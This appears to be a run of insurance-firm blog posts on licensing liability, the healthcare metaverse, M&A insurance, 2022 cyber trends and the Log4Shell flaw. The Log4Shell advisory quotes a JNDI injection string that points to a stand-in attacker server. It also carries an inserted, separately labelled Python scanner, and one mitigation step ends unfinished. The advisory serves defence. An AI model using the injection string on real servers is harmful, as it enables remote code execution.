Keeping you updated

Licensing Liability Risks

Many businesses, such as food companies, manufacturers and fashion firms, use third-party intellectual property (IP) provided to them by way of a license agreement.

CFC's specialist product provides protection for unintentional breaches of this agreement. Check out some of our recent risks in this area.

Celebrity endorsement deal

A drinks company had an endorsement agreement with a renowned music artist with the intention that the artist would promote and market the drinks on the artist’s social media platforms, as well as at concerts and events. The agreement required the artist to purchase insurance for breach of contract, as well as IP infringement and breach of confidentiality. The artist had media liability insurance for their music but didn’t have anything in place for the endorsement agreement.

CFC’s license agreement liability policy provided a solution for this, specific to the drinks company’s contract.

Merchandise license agreement

A manufacturer of collectibles had an agreement with a major toy company to use popular imagery on some merchandise. The manufacturer carried a small errors and omissions sub-limit on their package policy, but their policy’s $250k sub-limit for IP infringement did not meet the toy company’s requirements for a $2m limit, and the existing insurer had no capacity to increase it.

CFC were able to write a contract-specific policy which met the toy company’s requirements, enabling the manufacturer to sign the agreement and earn profit from the merchandise sales.

Brand sponsorship of events

A car company and a credit card company sponsor a popular food festival in the USA. As part of their agreement with the festival organizer, they license the use of their logos, trademarks and promotional videos to the festival for a short period of time. As licensors, they are concerned with the protection of their IP and trademarks and request the licensee to purchase IP infringement cover, as well as breach of the sponsorship agreement, so they insert a $5m insurance requirement into the agreement.

The festival organizer was able to purchase cover from CFC for both sponsorship agreements under a single policy.

Naming rights

A cryptocurrency exchange wanted to become sponsors of their local basketball team in the USA to show their support and increase the visibility of their brand. The sponsorship involved a change in name of the basketball arena that the team trained in. Originally it was named after the previous sponsor, an airline, but it would now be changed to the name of the cryptocurrency exchange.

The contractual agreement presented an IP exposure that the sponsored party did not have cover for, since they were granted rights to use players’ images and team logos in their own advertising. CFC’s license agreement liability policy was able to satisfy this need.

Source: www.cfcunderwriting.com

Metaverse and Healthcare in Tandem

There is already an ongoing move towards digital healthcare, which enables patients and healthcare professionals to view, share, exchange, create, or otherwise interact with digital content. In practice, it means the ability to do things such as make appointments online, provide consultations by video conferencing, and maintain patient files digitally and in the cloud.

The metaverse moves things on and offers a more interactive experience. It uses virtual reality, augmented reality and/or merged reality to create a fully synthetic or enhanced physical experience.

So, how does this play out in practice? Well, let’s take a few examples. In 2020, EndeavorRX became the first virtual reality game to be approved by the United States Food and Drug Administration as a prescribed treatment for children with attention deficit hyperactivity disorder. Increasingly, healthcare professionals are exploring how virtual reality games could help to treat other conditions such as depression and post-traumatic stress disorder.

Metaverse technology is also breaking new ground in the operating theatre. One example is xvision, which is an augmented reality surgical navigation system. The headset projects CT scan images on to the surgeon’s retina, enabling them to maintain their focus on the patient during surgery and avoid the need to look back and forth at a screen during the operating procedure.

Money in a healthy metaverse
Metaverse technologies might not yet be the common staple of the digital health market, but they are gaining traction quickly. There’s been $198m in funding for US digital health startups integrating VR or AR technologies in 2021, more than double that of 2020.

There is a lot of interest in the patent and trademark status of these technologies and the licenses in place to use them.

The importance of this protection in the healthcare market was underscored recently by CVS Health. It wants to be recognized as the first pharmacy in the metaverse and has made an application to the United States Patent and Trademark Office to trademark its logo and the activities of its online store.

The healthcare metaverse future is largely unknown
As the healthcare metaverse expands, so do the risks. We don’t know everything, but we can prepare for as much as we can. Healthcare companies will need to protect the proprietary and licensed technology and products they are using in this space, as well as the patients they are attending to. The competition will be fierce and access to insurance protection and expertise will be increasingly valuable.

Source: www.cfcunderwriting.com

What to Know when your Client is Selling their Business

M&A transactions are complicated and often fraught with risk. As your client looks to you as a trusted advisor during a business sale, what advice can you offer them to make sure they exit with the sale-price proceeds in their pocket?

Here are 4 key things you should know when your SME client is selling their business, and the important role of M&A insurance in facilitating their deal.

The buyer can claim against your client even after the deal closing
During an M&A transaction, SME owners can be mistaken in thinking that their contractual obligations are complete once the deal closes. However, many risks in M&A come after the deal closes and may not arise for a significant amount of time. In fact, a buyer can make a claim against the seller for breach of sale contract up to 6 years after the business has been sold!

If a buyer asserts a breach of a representation or warranty in the sale contract, the seller would be responsible for defense costs, as well as reimbursing the buyer for the loss suffered if the claim is valid or settled.

Some small business sellers who don’t have adequate protection in place risk having to hand back some, or all, of their proceeds.

Innocent misrepresentations can damage a deal
One of the biggest risks when it comes to M&A transactions is innocent misrepresentations. An innocent misrepresentation is a statement by the seller that is neither fraudulent nor negligent, but that is still untrue, often unknowingly. Your client may claim to know their company inside out, but in an evolving and fast-changing regulatory environment, even the most well-intentioned seller can have blind spots. These accidental misrepresentations can still be claimed against after the deal is done and the seller would be responsible.

Existing insurance is unlikely to provide adequate cover
Many SME sellers will have E&O or D&O cover for their businesses, but they can be caught off guard when they learn those policies won’t protect them during the sale of their business. The most common misunderstanding is that D&O policies will cover breach of representation in a sale, which is almost universally untrue.

M&A insurance can really help small deals
A key benefit of M&A insurance is that it provides SME sellers with cover for indemnity and defense costs arising from a claim, giving sellers peace of mind should the worst happen. It can also help the seller negotiate to reduce, or eliminate, their escrow obligations and unlock the sale proceeds immediately after the deal closing. In many cases, M&A insurance can even put the seller in a better negotiating position and enable them to maximize the sale price of their business.

CFC recently launched a first-to-market transaction liability policy created specifically to protect small business sellers in M&A deals.

If you have any questions, please follow the link below.

Source: www.cfcunderwriting.com

Cyber Trends Predicted for 2022

2021 was certainly a time of change for the cyber insurance market and it’s looking like 2022 will be no different.

The cyber threat landscape over the last year has proven to be the most volatile yet in the history of the market, for the simple reason that the risk is too low and the profitability too high for threat actors. As a result, cyber insurers have had to evolve just as quickly to prevent and respond, leading to the following predictions for the year ahead:

Zero-day ransomware attacks
Zero-day ransomware attacks will dominate the headlines, whereby criminals exploit software vulnerabilities before any patches are available for businesses to defend against them. This means that the only way to prevent an attack is through improved security controls in advance.

Fear of a systemic risk event
Third party dependencies will continue to be a weak link for cyber risk. Managed service providers and cloud computing providers will continue to be lucrative targets for cybercriminals, with the fear of the next large-scale systemic risk event – where a single event has the potential to impact thousands of businesses – at the forefront of everyone’s mind.

Cyber insurance = risk management service
Cyber insurance will predominantly become a proactive risk management service. Insurers will seek to prevent claims before they happen and will pivot to conducting scans to detect vulnerabilities as an added service through mobile app technology.

Increased regulatory and governmental scrutiny
There will be increased scrutiny by both regulators and government advisory groups, with a focus on improving security standards for businesses to prevent attacks. Equally, government bodies will seek, through legislation, to ensure there is more transparency around when businesses decide to pay ransom demands.

Targeting manufacturers and distributors
Criminals will continue to target businesses in industries where standards for security have historically been weak. Manufacturers and distributors have been particularly impacted in the last year given dependencies on automation, robotics, and the supply chain as entryways into their networks.

Continual hardening of the market
As a result, the cyber market is expected to continue to harden with more corrective action taken on rates to ensure the coverage can be maintained as broadly as it has been. Cyber will move from ‘hard to sell’ to ‘hard to buy’ based on limited available capacity, and undoubtedly become where a company’s largest exposure now lies.

So, that’s what CFC thinks will be the most prominent trends hitting the cyber insurance market throughout 2022, but what do you think?


Source: www.cfcunderwriting.com

Log4Shell Vulnerability

Log4Shell (CVE-2021-44228) is a critical vulnerability that has been actively exploited and scanned for by malicious actors since its discovery at the beginning of December. It enables attackers to run arbitrary code on servers running vulnerable versions of the Apache Log4j 2 library.

What is Log4j 2?

The Log4Shell vulnerability results from how log messages are handled by the processor in log4j2, an open-source logging service provided by the Apache Group that provides logging for numerous projects.

An attacker can send a specially crafted message, which contains a link to a server they control. For example, they may send a message including the string ${jndi:ldap://evil.xa/x}, where ldap://evil.xa is the attacker-controlled server.

The specially crafted message is passed to the log4j library so it can be logged, but in doing so it queries the malicious server. The malicious server will then respond with directory information, along with whatever code the attacker wants to execute on the victim server. Finally, the victim server downloads this response and executes the code included in the response.

Some of the products known to be using this library, and therefore affected by the vulnerability, are:

Apache Druid
Apache Dubbo
Apache Flink
Apache Flume
Apache Hadoop
Apache Kafka
Apache Solr
Apache Spark
Apache Struts
Apache Tapestry
Apache Wicket
Elastic Elasticsearch
Elastic Logstash
Apache Tomcat
Elastic Kibana
JavaServer Faces
Oracle ATG Web Commerce
Spring Framework

Why is this critical?

The vulnerability itself allows an attacker to load arbitrary – potentially malicious – code into the target server. This code might add a backdoor to a server, cryptojack or even carry out a ransomware attack.

The vulnerability was published earlier in December alongside a working proof-of-concept that would enable malicious actors to exploit it.

How to mitigate?

To mitigate against this vulnerability, we recommend installing the latest updates (2.15.0 or later), and the regular and timely updating of any affected third-party software. This should be done on all devices, not only those directly exposed to the internet.

To support the first priority action above, you also should determine if Log4j is installed elsewhere. Java applications can include all the dependent libraries within their installation. To do this, you should undertake a file system search for log4j, searching inside EAR, JAR and WAR files e.g.:

find / -type f -print0 |xargs -n1 -0 zipgrep -i log4j2 2>/dev/null

If a dependency or package manager is used, this can be searched. For example:

dpkg -l | grep log4j

There could be multiple copies of Log4j present and each copy will need to be updated or mitigated.
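
An added example, not part of the original article or any CFC tooling: a Python version of the archive search above that also descends into nested archives (JARs packed inside WAR/EAR files) and reads the version of each log4j-core copy it finds. The sample archive is constructed for illustration, the function names are assumptions, and the 2.15.0 threshold is the one recommended above.

```python
import io
import re
import zipfile

ARCHIVE_EXTS = (".jar", ".war", ".ear")
# Entries that identify a log4j-core copy inside an archive.
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
FIXED = (2, 15, 0)  # minimum version the text above recommends

def needs_update(version):
    """True when the version is unknown or older than FIXED."""
    nums = re.findall(r"\d+", version or "")
    return len(nums) < 2 or tuple(int(n) for n in (nums + ["0"])[:3]) < FIXED

def scan_archive(data, label, depth=0):
    """Return [(location, version, needs_update)] for each log4j-core copy,
    descending into nested archives (JARs inside WAR/EAR, fat JARs)."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return []  # not an archive, or corrupt: nothing to report
    found = []
    with zf:
        names = sorted(zf.namelist())
        if JNDI_CLASS in names or POM_PROPS in names:
            text = zf.read(POM_PROPS).decode("utf-8", "replace") if POM_PROPS in names else ""
            m = re.search(r"^version=(\S+)", text, re.M)
            version = m.group(1) if m else None
            found.append((label, version, needs_update(version)))
        for name in names:
            # Depth cap keeps a maliciously nested archive from recursing forever.
            if depth < 5 and name.lower().endswith(ARCHIVE_EXTS):
                found += scan_archive(zf.read(name), f"{label}!/{name}", depth + 1)
    return found

def make_zip(entries):
    """Build an in-memory archive from {name: bytes} for the constructed sample."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, body in entries.items():
            zf.writestr(name, body)
    return buf.getvalue()

# Constructed sample: a WAR with one old log4j-core copy nested in WEB-INF/lib.
CORE_JAR = make_zip({JNDI_CLASS: b"", POM_PROPS: b"version=2.14.1\n"})
SAMPLE_WAR = make_zip({"WEB-INF/lib/log4j-core-2.14.1.jar": CORE_JAR, "index.html": b""})

if __name__ == "__main__":
    print(*scan_archive(SAMPLE_WAR, "app.war"), sep="\n")
```

To scan a real file, pass its bytes and path to scan_archive; each tuple names the exact nested location that needs updating.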

If updating Log4j 2 is not feasible, this vulnerability can still be mitigated by setting system property “log4j2.formatMsgNoLookups” to “true”. This can be done by restarting the Java service through the use of an argument:

java -Dlog4j2.formatMsgNoLookups=true …

or you can set an Environment Variable for the JVM arguments:


Please contact your IT department with any questions on updates needed.

Source: www.cfcunderwriting.com



